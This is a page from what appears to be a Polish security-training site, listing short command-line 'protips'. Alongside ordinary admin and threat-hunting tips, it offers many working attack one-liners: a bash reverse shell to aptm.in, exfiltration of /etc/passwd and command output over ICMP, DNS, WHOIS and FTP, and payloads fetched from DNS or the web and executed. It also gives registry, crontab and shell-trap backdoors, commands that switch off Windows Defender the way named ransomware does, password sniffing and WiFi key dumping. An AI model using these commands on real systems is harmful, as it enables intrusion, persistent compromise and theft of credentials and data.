alphasec academy
aptmasterclass forge

Subskrybuj

Jeśli chcesz otrzymywać nowe, mięsiste protipy na maila, a także zostać czasem powiadomiony o wartościowych wydarzeniach - dołącz do subskrybentów.

Kolejny sposób blokowania ekranu PowerShellem: (Add-Type -m '[DllImport("user32.dll")]public static extern bool LockWorkStation();' -Name "Lock" -pas)::LockWorkStation()

#Powershell, #ProzaŻycia, #Windows

Add-Type -t 'public class User32 {[System.Runtime.InteropServices.DllImport("user32.dll")] public static extern bool LockWorkStation();}'; [User32]::LockWorkStation() - zablokuj ekran PowerShellem

#Powershell, #ProzaŻycia, #Windows

rundll32 user32,LockWorkStation - zablokuj ekran z wiersza poleceń

#Windows, #ProzaŻycia

while read -r line; do echo "Linia: $line"; done < dict.txt - jeden ze sposobów czytania linijka po linijce z pliku

#Unix, #Bash, #ProzaŻycia

Add-Type -t 'public class Foo { public static void Main(){ System.Console.WriteLine("Ciekawe te protipy!");}}';[Foo]::Main() - uruchom kod C# prosto z PowerShella

#PowerShell, #CSharp, #RedTeam, #Magic

Gadający PowerShell: Add-Type -AssemblyName System.Speech; [Speech.Synthesis.SpeechSynthesizer]::new().Speak("Fajne te protipy")

#PowerShell, #DotNET, #Fun

(Get-Date)-(gcim Win32_OperatingSystem).LastBootUpTime - uptime w Windows PowerShellu

#PowerShell, #RedTeam, #BlueTeam, #Recon

Skaner portów TCP w bashu: for p in {22,443,2083,8880,31337}; do (timeout 1s bash -c "</dev/tcp/berkeley.edu/$p")2>/dev/null && echo "$p - open"||echo "$p - closed"; done

#Unix, #Bash, #RedTeam, #Recon

Podręczny skaner portów w PowerShellu: 22,443,2083,8880,31337|%{"$_ - "+([Net.Sockets.TcpClient]::new()).ConnectAsync("berkeley.edu", $_).Wait(1000)}2>$null

#Powershell, #RedTeam, #Recon

ps uax | grep [p]wsh - odnajdź wśród procesów tekst pwsh, jednak pomiń proces z grepem

#Linux, #MacOS, #BlueTeam, #ProzaZycia

Start-Process -Verb RunAs powershell.exe - uruchom proces powershell.exe z uprawnieniami administratora

#Powershell, #Admin, #BlueTeam, #ProzaŻycia

Żeby przyjemniej się pracowało w Windows PowerShellu (5.1), zainstaluj nowy PSReadLine: Install-Module -Name PSReadLine -AllowClobber -Force

#Powershell, #Admin, #BlueTeam, #ProzaŻycia

tail -F access.log wyświetla aktualnie dopisywaną zawartość pliku, nawet kiedy zostanie on usunięty i stworzony na nowo (czego nie robi tail -f access.log)

#Linux, #MacOS, #BlueTeam, #ProzaZycia

& "C:\Program Files\Wireshark\tshark.exe" -i Wi-Fi -l -T fields -e data "icmp[0]=8" | % { -join ($_ -split "(.{2})" -match "." | % { [char][byte]"0x$_"}) } - wyświetl payload pakietów ICMP

#Powershell, #Admin, #BlueTeam, #Magic

Dodaj kolejny katalog do zmiennej środowiskowej PATH dla wszystkich: [Environment]::SetEnvironmentVariable('Path', [Environment]::GetEnvironmentVariable('Path','Machine')+';C:\Program Files\Wireshark', 'Machine')

#Powershell, #Admin, #ProzaŻycia

Get-Command -Type Application - lista binarek z $env:PATH, by móc zapolować na LOLBiny niczym @0gtweet

#Powershell, #RedTeam, #Hunting, #LOLBin

Nie wyobrażam sobie poważnej pracy po ssh bez screen-a. Najczęściej wykorzystywane u mnie skróty: CTRL+a c, CTRL+a n, CTRL+a p, CTRL+a A, CTRL+a ", CTRL+a ESC

#Linux, #unix, #ssh, #admin, #ProzaŻycia

Eksfiltracja po ICMP w jednym wierszu: (ipconfig|Out-String) -split "(?s)(.{1472})" -match "."|%{ [Net.NetworkInformation.Ping]::new().Send("alphasec.pl", 100, ([Text.Encoding]::UTF8).GetBytes($_))}

#Powershell, #RedTeam, #Exfil, #ICMP, #Beauty

watch -n 5 w - co 5 sekund wyświetlaj listę zalogowanych użytkowników wraz z kilkoma pożytecznym informacjami

#Linux, #macos, #admin, #ProzaŻycia

(New-Object -ComObject Outlook.Application).session.GetDefaultFolder(10).items|select FullName,MobileTelephoneNumber,Email1Address|ft -a - pobranie kontaktów z Outlooka

#Powershell, #RedTeam, #Exfil, #Admin

ipconfig Outlookiem: $m=(New-Object -c Outlook.Application).CreateItem(0);$m.To="darklord@localhost";$m.Subject="ip";$m.Body=(ipconfig|out-string);$m.Send()

#Powershell, #RedTeam, #Exfil, #Admin

sudo lsof -Pn -sTCP:LISTEN -i4TCP - wyświetl aplikacje nasłuchujące na portach TCP IPv4

#MacOS, #Linux, #Unix, #BlueTeam, #Recon

CTRL+SHIFT+ESCAPE - uruchom Menedżer zadań

#Windows, #ProzaZycia

Skróty (.lnk) pod lupą: gci *.lnk | % { (New-Object -com WScript.Shell).CreateShortcut($_)} | select fullname,targetpath,arguments | fl

#Powershell, #BlueTeam, #ThreatHunting, #Malware

sed -i s/root/toor/g /etc/passwd - zmień frazy root na toor w pliku /etc/passwd

#Linux, #Unix, #MacOS, #Bash, #ProzaŻycia

Get-PnpDevice -PresentOnly - wyświetl aktualnie podłączone urządzenia Plug and Play

#Powershell, #RedTeam, #BlueTeam, #Recon

WebSockety w Powershellu, czyli aktualnie rejestrowane certyfikaty SSL na żywo: iwr aptm.in/g/certstream|iex; Invoke-CertStream

#Powershell, #RedTeam, #BlueTeam, #ThreatHunting, #SSL

-join [char[]]$arr - szybki, sprytny sposób na zamianę tablicy bajtów na łańcuch znaków

#Powershell, #ProzaŻycia, #HackWay

Powiesiła Ci się sesja ssh i chcesz ją zabić, odzyskując terminal? Użyj ~.

#Linux, #SSH, #DevOps, #ProzaŻycia

Szybki upload FTP? Easy! [Net.WebClient]::New().UploadFile("ftp://key:logger@ftp.aptmc.pl/key.log", (gi "key.log"))

#Powershell, #RedTeam, #Exfil

Lista subdomen cia.gov na podstawie rejestrowanych certyfikatów: curl -s 'https://crt.sh?output=json&q=cia.gov'|jq '.[].name_value'|sort -u

#Linux, #Bash, #DevOps, #Recon

(irm crt.sh -b @{output="json";q="cia.gov"}).name_value|sort -u - lista domen w cia.gov na podstawie rejestrowanych certyfikatów

#Powershell, #RedTeam, #BlueTeam, #Recon

for a in /proc/[0-9]*; do echo -n "`basename $a` (`stat -c %U:%G $a`) "; cat $a/cmdline|tr "\0" " "; echo ; done|sort -n - lista procesów bez polecenia ps

#Linux, #Bash, #DevOps, #Recon

Wykorzystując mikrokontroler ATmega32U4 łatwo zbudujemy własny pendrive-klawiaturę niczym Rubber Ducky

#Hardware, #Arduino, #Powershell, #RedTeam, #BlueTeam

(netsh wl sh net) -match "^SSID" - lista dostępnych sieci WiFi

#Powershell, #RedTeam, #BlueTeam

Przekieruj wynik polecenia bezpośrednio do wygodnego przetwarzania w vimie: ps uax | vim -

#Linux, #Unix, #MacOS, #Bash, #ProzaŻycia

Restart-Computer - zrestartuj komputer. Po prostu.

#Powershell, #RedTeam, #BlueTeam

(iwr thehackernews.com).Links.Href | sls '/20' - pobierz linki do ostatnich artykułów na thehackernews.com

#Powershell, #RedTeam, #BlueTeam

ni -f "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mspaint.exe" | sp -name Debugger -Value "powershell -c iwr aptmc.pl/calc|iex #" - dodaj backdoor uruchamiany zamiast startu MS Painta

#Powershell, #RedTeam, #BlueTeam, #Backdoor

sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'DELETE from LSQuarantineEvent' - usuń historię pobranych plików na MacOS z kwarantanny

#MacOS, #RedTeam, #BlueTeam, #Recon, #Forensics

sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select DISTINCT LSQuarantineDataURLString from LSQuarantineEvent' - pokaż historię pobranych plików na MacOS

#MacOS, #RedTeam, #BlueTeam, #Recon, #Forensics

filter fb64 { [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($_)) } - przydatny filtr do dekodowania Base64

#Powershell, #RedTeam, #Base64

ssh -t drg@host "screen -dRS foo" - i zrywane sesje SSH nie straszne

#Linux, #Unix, #MacOS, #Bash, #RedTeam, #BlueTeam, #ssh, #ProzaŻycia

cat /etc/passwd | pbcopy - wrzuć zawartość wskazanego pliku prosto do schowka

#MacOS, #Clipboard, #RedTeam

Get-MpThreatDetection - wyświetl zidentyfikowane przez Windows Defendera zagrożenia

#Powershell, #RedTeam, #BlueTeam, #Windows, #WindowsDefender

Wyświetl wyłączone opcje Windows Defendera: $WDprefs=(Get-MpPreference); gm -i $WDprefs -n Disable*|% { if ($WDprefs.($_.Name) -eq $True) { Write-Host -f red ("{0} ma wartosc {1}!" -f $_.Name,$WDPrefs.($_.Name)) } }

#Powershell, #RedTeam, #BlueTeam, #Windows, #WindowsDefender

Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend - wyłącz Windows Defendera niczym Trickbot, REvil Ransomware czy inny malware

#Powershell, #RedTeam, #Malware, #Windows, #WindowsDefender

ping -a 10.0.0.1 - powiadom dźwiękowo, kiedy pingowany host wróci

#Linux, #Unix, #MacOS, #Bash, #RedTeam, #BlueTeam, #Admin

powershell -w h -enc (gp HKCU:\Software\Microsoft\Windows).Signature - uruchom payload ukryty wcześniej w rejestrze, zakodowany w base64

#Powershell, #RedTeam, #Backdoor, #Rejestr, #Windows

Zmień/stwórz nową wartość w rejestrze: sp HKCU:\Software\Microsoft\Windows Signature "YwBhAGwAYwA="

#Powershell, #RedTeam, #Backdoor, #Rejestr, #Windows

Twój oneliner jest coraz dłuższy? Użyj fc, żeby edytować poprzednie polecenie w domyślnym edytorze tekstu

#Linux, #Unix, #MacOS, #Bash, #RedTeam, #blueteam, #admin

caffeinate -i - nie pozwól, by macbook usnął

#MacOS, #RedTeam, #BlueTeam, #ProzaZycia

$env:PSExecutionPolicyPreference = "Bypass" - jeden ze sposobów ominięcia Polityki Uruchamiania Skryptów (ExecutionPolicy)

#Powershell, #RedTeam, #Windows

trap '`curl -ksL aptmc.pl/trap/`' EXIT - backdoor uruchamiający złośliwy payload po zakończeniu sesji terminala

#Linux, #Unix, #MacOS, #Bash, #RedTeam, #Backdoor

(gcm ssh).source - wyświetl pełną ścieżkę do polecenia ssh

#Powershell, #RedTeam, #BlueTeam, #Windows

log show --style compact --predicate 'process == "sharingd" && eventMessage CONTAINS "WiFi join start"' --last 1d - pokaż z jakimi WiFi łączył się ostatnio Mac

#MacOS, #RedTeam, #Recon, #Forensics

Parametr -Wait cmdletu Get-Content pozwoli monitorować nowe linie dopisywane do pliku

#Powershell, #RedTeam, #BlueTeam, #Windows

Monitorowanie plików na żywo może być wygodniejsze z wykorzystaniem less +F zamiast tail -f

#Linux, #MacOS, #BlueTeam, #ProzaZycia

(sv -o a -p password "").Attributes.Add([ValidateScript]({irm "aptmc.pl/?$_";return $true;})) - eksfiltruj zmienną password kiedy tylko zostanie ustawiona

#Powershell, #RedTeam, #Windows, #Backdoor

netsh wlan export profile folder=. key=clear - wyeksportuj sieci WiFi wraz z hasłami

#Powershell, #Windows, #RedTeam, #Recon

mdls -name kMDItemWhereFroms plik.zip - pokaż skąd został pobrany plik plik.zip

#MacOS, #threathunting, #blueteam

Get-ScheduledTask|%{[pscustomobject]@{Name=$_.TaskName;Execute=$_.Actions.Execute;Args=$_.Actions.Arguments}}|Out-GridView - zapoluj na złośliwe zadania

#Powershell, #BlueTeam, #ThreatHunting, #Windows, #Backdoor

pbpaste - wykradnij zawartość schowka w macOS X

#MacOS, #Clipboard, #RedTeam

Get-Service | ConvertTo-Html > services.html - eksportuj listę usług do HTML

#Powershell, #RedTeam, #Recon, #Administration, #Windows

Get-NetIPAddress -AddressState Preferred|select IPAddress,InterfaceAlias - wyświetl aktywne interfejsy sieciowe i ich IP

#Powershell, #RedTeam, #Recon, #Administration, #Windows

gc -head 10 plik.txt, gc -tail 10 plik.txt - wyświetl odpowiednio 10 pierwszych linijek i 10 ostatnich linijek pliku

#Powershell, #ProzaZycia

Polowanie na latające po sieci hasła: tcpdump -n -i any -A -l port http or port ftp or port smtp or port imap or port pop3|grep --color -Ei -C 2 'authorization:|pass=|pwd=|login=|user=|username=|user |pass '

#Unix, #Bash, #RedTeam, #Tcpdump, #Passwords

gci -r $HOME|gi -s *|where Stream -ne ':$DATA'|select Filename,Stream - znajdź w katalogu domowym użytkownika pliki, które posiadają ukrytą zawartość jako Alternate Data Streams

#Windows, #Powershell, #BlueTeam, #ThreatHunting

_(){ _|_& };_ - bashowa fork bomba pozwalająca sprawdzić poprawność konfiguracji systemów Unix/Linux

#Unix, #Bash, #RedTeam, #BlueTeam, #Administration

for(){$p=(gps|Sort-Object -D CPU|Select -First ($Host.UI.RawUI.WindowSize.Height-4)|Out-String).trim();cls;""+(date);$p;sleep 1} - *nixowy top w Powershellu

#Powershell, #BlueTeam, #Administration

New-Item -Path "HKCU:\Software\Microsoft\Command Processor" -Force|Set-ItemProperty -Name AutoRun -Value "mspaint" - dodaj backdoora, który przy uruchamianiu cmd.exe uruchomi również coś dla zabicia nudy

#Windows, #Powershell, #BlueTeam, #RedTeam, #ThreatHunting

Warto czasem spojrzeć, czy nie były podłączane podejrzane klawiatury: ls HKLM:\SYSTEM\CurrentControlSet\Enum\HID\*

#Windows, #Powershell, #BlueTeam, #ThreatHunting

Symulacja klawiatury Powershellem? Czemu nie: Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.SendKeys]::SendWait('^{ESC}calc.exe{ENTER}')

#Windows, #Powershell, #RedTeam

$i=gp HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU; $i.MRUList.ToCharArray()|%{$i.$_} - pokaż ostatnio uruchamiane polecenia

#Windows, #Powershell, #RedTeam, #ThreatHunting

for a in $(cat /etc/passwd|openssl base64); do curl -s ftp://exfil.aptmc.pl/test_$a -O /dev/null; done - eksfiltruj dane pod płaszczem zapytań FTP

#Unix, #Bash, #Exfil, #RedTeam

python -m pyftpdlib -p 21 -w - uruchom anonimowy serwer FTP do zapisu

#Unix, #RedTeam, #BlueTeam, #FTP, #Exfil, #Python

1..254 | % {Resolve-DnsName x.x.x.$_ -ErrorAction SilentlyContinue} - rekonesans RevDNS

#Powershell, #Recon, #DNS, #RedTeam

$ErrorActionPreference = "SilentlyContinue" - nie wyświetlaj (krytycznych) błędów i cichutko kontynuuj wykonywanie

#Powershell #cmdlet

echo 'PROMPT_COMMAND="history -a"' >> ~/.profile - aktualizuj ~/.bash_history na bieżąco

#Unix, #Bash, #PowerUser

filter tb64 { [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($_)) } - przydatny filtr do kodowania Base64

#Powershell, #RedTeam, #Base64

while(1) { if ((Get-Clipboard) -match "\.exe") { Set-Clipboard "calc.exe" } sleep 1 } - malutkie nadużycie schowka

#Powershell, #RedTeam, #Malware, #Clipboard, #Windows

less -r <plik> - czytaj <plik> wyświetlając kolory i inne znaki sterujące

#Unix, #Bash, #ProzaŻycia

ls env: wyświetli zmienne środowiskowe

#Powershell, #Recon, #ProzaŻycia

ls HKCU:\Software\Sysinternals|select Name - pokaż które narzędzia z Sysinternals (np. PsExec) były używane

#Powershell, #ThreatHunting, #BlueTeam, #Windows, #Sysinternals

curl -i https://nasa.gov/ - wyświetl odpowiedź serwera HTTP wraz z nagłówkami

#Bash, #RedTeam, #Blueteam

([adsisearcher]"objectCategory=computer").FindAll() - pobierz listę komputerów z Active Directory

#Windows, #RedTeam, #Powershell, #ActiveDirectory, #Recon

Get-Acl pomoże szybko sprawdzić uprawnienia zarówno do plików/katalogów jak i kluczy w rejestrze

#Powershell, #Windows, #RedTeam, #BlueTeam

rundll32.exe c:\windows\system32\comsvcs.dll MiniDump 555 555.dmp full - zapisz zrzut pamięci procesu o ID 555

#Windows, #RedTeam

Powershellowy Select-String pomoże odnaleźć interesujące stringi niczym grep

#Powershell, #Windows, #RedTeam, #BlueTeam

strings.exe z pakietu Sysinternals pomoże szybko analizować tekst w plikach binarnych

#Windows, #RedTeam, #BlueTeam, #Sysinternals

Potrzebujesz wrócić do zagłębionego katalogu, z którego przez przypadek wyszedłeś? Ratunkiem będzie cd -

#Bash, #Prozażycia

whois -h aptm.in "$(cat /etc/passwd)" - eksfiltruj dane z wykorzystaniem usługi WHOIS

#Bash, #RedTeam, #Exfil

Wyświetl internetowe połączenia TCP: Get-NetTCPConnection -AppliedSetting Internet

#Powershell, #BlueTeam, #ThreatHunting

Get-FileHash c:\Windows\System32\cmd.exe - wyświetl hash SHA256 pliku

#Powershell, #BlueTeam, #ThreatHunting

Get-DnsClientCache|select data,entry|fl - pokaż cache DNS

#Powershell, #RedTeam, #ThreatHunting, #Exfil, #DNS, #Recon

ssh -L 8080:intranet:80 aptm.in - tuneluj intranet:80 dostępny z aptm.in do localhost:8080

#SSH, #Linux, #Windows, #RedTeam, #BlueTeam, #Pivoting, #DevOps

ssh -R :8080:localhost:80 aptm.in - udostępnij lokalny port 80 na aptm.in:8080

#SSH, #Linux, #Windows, #RedTeam, #BlueTeam, #Pivoting

Uruchom autoruns.exe prosto z linii poleceń: \\live.sysinternals.com\tools\autoruns.exe i zobacz co startuje

#Windows, #BlueTeam, #ThreatHunting

Payload DNS-over-HTTPS dla *nixów: curl -ks "https://dns.google/resolve?name=echo.aptmc.pl&type=txt"|jq '.Answer[0].data'|tr -d '"\'|base64 -d|sh

#Bash, #RedTeam, #DNS, #Unix, #Infil, #C2

Infiltracja po DNS-over-HTTPS: (irm "https://dns.google/resolve?name=calc.aptmc.pl&type=txt").answer.data|iex|iex

#Powershell, #RedTeam, #DoH, #DNS, #Windows, #Infil, #C2

ps|gm - dzięki Get-Member (gm) poznasz co ma do zaoferowania zwracany obiekt

#Powershell, #RedTeam, #BlueTeam, #GoodToKnow

host -t txt echo.aptmc.pl|awk -F'"' '{ print $2 }'|openssl base64 -d|sh - uruchom payload z DNS na *nixach

#Bash, #RedTeam, #DNS, #Unix, #Infil, #C2

Pobierz i uruchom payload po DNS: [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String((Resolve-DnsName -Type TXT msg.aptmc.pl).strings))|iex

#Powershell, #RedTeam, #DNS, #Windows, #Infil, #C2

docker run -p 8080:8080 remnux/cyberchef - własna instancja CyberChefa na porcie 8080

#Docker, #CyberChef, #MustKnow, #SwissKnife

socat -T 7 TCP-LISTEN:2048,pktinfo,fork,reuseaddr SYSTEM:'cat > loots/tcp/$SOCAT_PEERADDR.$$.txt' - uniwersalny listener

#Linux, #RedTeam, #BlueTeam, #Exfil

Szybka eksfiltracja pliku po HTTP: iwr -me po -i <plik> http://<host:port>

#Powershell, #RedTeam, #Exfil

cat (Get-PSReadLineOption).HistorySavePath - wyświetl historię poleceń Powershella

#Powershell, #RedTeam, #BlueTeam, #ThreatHunting

Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0; Start-Service sshd - serwer ssh na Windowsie

#Windows, #Powershell, #SSH

ssh -D 2048 user@host - wykorzystaj zdalny host ssh jako szyfrowane proxy

#Linux, #Windows, #RedTeam, #BlueTeam, #Proxy, #SSH

(netsh wlan show profiles)|%{$n=(""+($_ -split ":")[1]).trim(); netsh wlan show profile name="$n" key=clear}|sls "Key Content","SSID name" - hasła WiFi na tacy

#Powershell, #Windows, #RedTeam, #Recon

whoami /all - coś więcej niż gołe whoami

#Windows, #RedTeam, #Recon

ps | Out-GridView - i życie staje się wygodniejsze

#Powershell, #Windows, #Usability

socat TCP-LISTEN:2048,fork,reuseaddr STDIO - obsłuż wielu klientów na porcie 2048

#Linux, #RedTeam, #BlueTeam, #Socat, #RevShell

(ls "HKCU:\Software\Microsoft\Office\*\*\Security\Trusted Documents\TrustRecords").Property - pokaż dokumenty Microsoft Office, którym zaufał użytkownik

#Powershell, #ThreatHunting, #BlueTeam, #Windows, #Office

gp HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run - pokaż co jest uruchamiane po zalogowaniu

#Powershell, #BlueTeam, #Backdoor, #Windows, #Autostart

iptables -t nat -p tcp -I PREROUTING -m multiport --dports 50:65535 -j REDIRECT --to-port 22 - przekieruje wszystkie połączenia TCP od portu 50 w górę na port 22

#Linux, #RedTeam, #BlueTeam, #Exfil

Podgląd payloadu ICMP w Scapy: python3 -c 'from scapy.all import *; sniff(filter="icmp and icmp[0]=8", prn=(lambda x: print(x[1].src, x[ICMP].load) if hasattr(x[ICMP], "load") else None ))'

#Unix, #RedTeam, #BlueTeam, #ICMP, #Exfil, #Python, #Scapy

hping3 --icmp -d 1000 aptm.in --file /etc/passwd - eksfiltracja po ICMP pliku /etc/passwd

#Unix, #RedTeam, #ICMP, #Exfil

Eksfiltracja po DNS? Proszę bardzo: iwr aptm.in/g/dnsex|iex; whoami|Invoke-DNSExfil foo.aptmc.pl

#Powershell, #RedTeam, #DNS, #Exfil

iwr aptm.in/g/icmpex|iex; ipconfig|Invoke-ICMPExfil aptm.in - eksfiltracja danych po ICMP w Powershellu to bajka

#Powershell, #RedTeam, #ICMP, #Exfil

setspn.exe -Q MSSQLSvc/* błyskawicznie wyciągnie wszystkie usługi MSSQL z AD

#Windows, #RedTeam, #Recon

(crontab -l; echo '0 4 * * * curl -ksL aptm.in/czwarta|sh') | crontab - może być zupełnie skutecznym backdoorem na Linux/Unix/MacOS

#Bash, #Backdoor, #RedTeam, #Unix

Wykorzystaj cmdlet Start-Transcript, żeby zapisać transkrypt dla istotnych sesji

#Powershell, #RedTeam, #BlueTeam,

gp "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\*"|where Debugger|select PSChildName,Debugger - jeśli wynik nie jest pusty - masz Problem

#Powershell, #ThreatHunting, #BlueTeam

alias ssh="ssh -M -S /tmp/%r@%h:%p -oControlPersist=yes" - bardzo fajny/bardzo groźny backdoor, zwłaszcza na hoście przesiadkowym

#Bash, #RedTeam, #SSH, #Backdoor, #LTO

docker run -p 443:443 mikesplain/openvas - uruchomienie działającego OpenVAS z wykorzystaniem Dockera

#Docker, #RedTeam, #MakeItLoud, #Recon, #Vulnerabilities

for i in {1..254}; do host x.x.x.$i|grep -v NXDOMAIN; done - szybki revdns recon danej sieci /24

#Bash, #RedTeam, #Recon, #OSINT

(irm ipinfo.io/json).ip - szybki sposób na uzyskanie zewnętrznego adresu IP

#Powershell, #RedTeam, #Recon

Udostępnij po HTTP na porcie 8000 aktualny katalog: python -m SimpleHTTPServer (Python2)

#Python, #HTTP, #RedTeam

bash -i >& /dev/tcp/aptm.in/1337 0>&1 - szybki reverse shell w czystym bashu do aptm.in na port 1337/TCP

#Bash, #RedTeam, #ReverseShell

Włączając Powershell Constrained Language Mode istotnie ograniczysz możliwości złośliwych skryptów

#Powershell, #BlueTeam, #MakeItHarder

Subskrybuj

Jeśli chcesz otrzymywać nowe, mięsiste protipy na maila, a także zostać czasem powiadomiony o wartościowych wydarzeniach - dołącz do subskrybentów.